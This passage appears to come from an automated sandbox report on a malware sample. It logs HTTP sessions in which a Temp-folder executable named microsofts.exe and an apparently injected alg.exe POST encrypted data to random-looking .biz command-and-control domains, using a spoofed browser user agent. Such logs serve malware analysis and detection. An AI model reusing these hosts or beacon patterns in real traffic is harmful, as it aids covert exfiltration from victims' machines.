                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              135192.168.2.559810208.100.26.245801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:34.836910963 CET346OUTPOST /i HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: gjogvvpsf.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:34.836940050 CET828OUTData Raw: e0 90 48 fa c4 71 39 a5 30 03 00 00 9f 4f c1 e2 0a af 6a 14 5d d1 d8 8d bd 63 73 6e 90 8d 1b 35 f1 1f ef 70 87 18 93 5d be cb a4 ab 0e a2 c4 f9 96 38 b8 0b 3d b7 ae 48 2d e9 99 6f 6e aa 6b cb 9d be e8 40 d0 41 7e e7 1b 72 46 2b 4a c3 2d b8 d9 59
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: Hq90Oj]csn5p]8=H-onk@A~rF+J-YpwPIEXtmfSe%tu';a.T:<27tL@/cvE^vv]c6k#FbAHbvzF=uW?U|P;kac{G2zK
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:35.477526903 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:04:35 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              136192.168.2.559811208.100.26.245801492C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:35.054140091 CET357OUTPOST /xflcwjjwcbmi HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: gjogvvpsf.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:35.054156065 CET778OUTData Raw: 0d c6 33 51 33 88 8e 9d fe 02 00 00 8e c4 36 4f d0 90 75 9a c6 f2 91 a7 f6 31 b7 77 a3 26 88 f4 6a 00 b2 ad 6d e6 d2 8d 96 b2 61 38 dc eb 61 ac 18 54 a1 f1 a8 03 8b b5 b7 e4 45 c5 26 4e 8e 99 e5 ef ec 5f 39 2d 99 c5 4e 10 35 fe 00 23 d8 30 55 e9
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 3Q36Ou1w&jma8aTE&N_9-N5#0UIO1aqKT>hb\<,`W;VpeeD'VlDmG%TzMHm3I=m%a;hfHo#k8MRxEnDi2}@d`(=B#9i)
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:35.695395947 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:04:35 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:35.733706951 CET357OUTPOST /sbplnevnaxjj HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: gjogvvpsf.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:35.733804941 CET778OUTData Raw: eb be 03 63 65 ed de df fe 02 00 00 fb 58 82 09 ed ca d0 54 3d 6c 63 65 0b dd bd ca 94 00 dd 5e 91 8a 60 0e bc 2a 59 90 bf 7e 98 e0 df 85 24 5c 25 0e a0 fa c6 cf 1c e3 63 72 73 88 f6 e0 b6 3c 83 cb 03 be 22 ef b0 4e e3 bf 00 b2 cf 6f 36 48 4a 56
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ceXT=lce^`*Y~$\%crs<"No6HJVmT |~GoqK.01@Wt:o3""*?9ZLD0jw+cl`ic)|(-/.=Q\~p:;3}P07gdv%{QJmjR<@j
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:35.878901005 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:04:35 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              137192.168.2.55981244.221.84.105801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:35.525202990 CET353OUTPOST /xnjeybrqhb HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: reczwga.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:35.525202990 CET828OUTData Raw: 38 62 f0 92 75 62 08 42 30 03 00 00 61 7c d3 65 9a d8 26 c7 32 e8 f7 03 a0 a0 8a 88 63 46 1c e8 a4 44 13 e6 e9 c0 8d 4f de dd 7c 04 8d 32 e6 d0 30 93 8c 58 2f d7 32 22 27 74 6c d8 01 f1 df 17 62 30 8f f0 af 4d 3d 5c ec f9 34 da 3d 68 fc e7 76 e5
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 8bubB0a|e&2cFDO|20X/2"'tlb0M=\4=hvu{BGa3S[8.CEDIQaf1G12_4CDQcFQs:+<>jg`_:SQde~DPp8-p9#Zy[d:9N+gB`b(
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:36.188997030 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:04:36 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=4148d1a123e0c838f75807fac97df4b7|173.254.250.76|1730822676|1730822676|0|1|0; path=/; domain=.reczwga.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              138192.168.2.55981334.211.97.45801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:36.219011068 CET355OUTPOST /qtclvagsdhvow HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: bghjpy.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:36.219075918 CET828OUTData Raw: 6f 5e 35 b7 51 96 41 c0 30 03 00 00 d9 79 11 53 ca 97 3d 0f 9e 10 f2 87 df 56 46 dd d7 a0 08 d5 2a fc aa 85 2b 9d 0b cd f8 60 97 58 b9 5c d8 ec 01 ad 2b 79 e5 e5 1d 55 1f 94 c3 af cc 87 58 50 4c ba 0d 74 dd aa a6 25 ff 74 c1 35 57 c1 3b 42 a0 ab
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: o^5QA0yS=VF*+`X\+yUXPLt%t5W;BA/X[q]GJKzjYX9>~*|.I`^fOE\.oi0Nmi;&&_y<w[P}3d[M
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:37.040661097 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:04:36 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=88a13abac031a42a53b9e8f2fa41f1b2|173.254.250.76|1730822676|1730822676|0|1|0; path=/; domain=.bghjpy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              139192.168.2.55981444.221.84.105801492C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:36.292485952 CET358OUTPOST /snxddmvolovsghk HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: reczwga.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:36.292485952 CET778OUTData Raw: 78 e3 ab aa 52 5c 67 3f fe 02 00 00 82 6d 8f 0e ba 84 68 9e e3 0c e8 68 7e 16 b0 83 63 3d 2c 43 6a 43 00 7b c3 9b a6 6c f7 46 0b 5c f0 cf b6 e5 78 e2 0f 2c 17 05 7a 77 74 9c f0 eb f3 f4 2a 7d 21 08 b2 e9 dd 4b ad e6 4e 1a 99 1b 0f e4 67 f0 75 62
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: xR\g?mhh~c=,CjC{lF\x,zwt*}!KNgubG$c78Zz1YVvRbf#R g<QfM#IZx.zlv.D^93Pi@k(v96g(ZHB%
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:36.946475983 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:04:36 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=f523d4e2ff7952a8ae7b9ce21e512de8|173.254.250.76|1730822676|1730822676|0|1|0; path=/; domain=.reczwga.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              140192.168.2.55981518.208.156.248801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:37.401132107 CET360OUTPOST /glquerlqdouqshy HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: damcprvgv.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:37.401181936 CET828OUTData Raw: 9a 48 b8 ea fe 35 e9 b5 30 03 00 00 06 2a 86 b4 10 8b 15 b4 08 51 aa c1 d5 3c a6 a6 1b 3a a0 24 3c 1b 42 b6 29 d5 56 4a 57 7c b9 e6 ee 75 60 ad e3 21 0b db c1 d2 4f d2 85 fa 46 6d 64 46 9a dc a4 47 87 ec 0a eb 36 63 b1 ac b5 2d e8 80 94 b1 e8 e9
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: H50*Q<:$<B)VJW|u`!OFmdFG6c-&ActX"~i&2|6joYhNnD(MP/zwF` =Vub$^(P7!exozk)QE%u4cb ev++;\'~+Vaec3|
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:38.062328100 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:04:37 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=a189e3f31bdeb0ac82541e7bc6791b29|173.254.250.76|1730822677|1730822677|0|1|0; path=/; domain=.damcprvgv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              141192.168.2.55981634.211.97.45801492C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:37.718473911 CET346OUTPOST /vnho HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: bghjpy.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:37.718527079 CET778OUTData Raw: e4 57 24 ba b5 82 10 f0 fe 02 00 00 48 a1 e2 55 fd 5f 8e 52 fd 7b 65 2e 71 6a 1e 93 ef 2b 62 4c 1e a2 43 ee f3 01 f4 a0 c7 60 14 0a 4b 62 0f bf 1a 48 42 fd f6 23 62 45 5e bf 6d fc 33 1f d2 03 85 d5 d4 67 58 03 79 1f af ba f9 28 2c 17 f1 30 0f 4d
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: W$HU_R{e.qj+bLC`KbHB#bE^m3gXy(,0Mioi/+".~*,$uHIBJ{xt[?,.';@=DR+M]Gxo7-EP)8S<;aLyAm3]lFlh
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:38.540276051 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:04:38 GMT
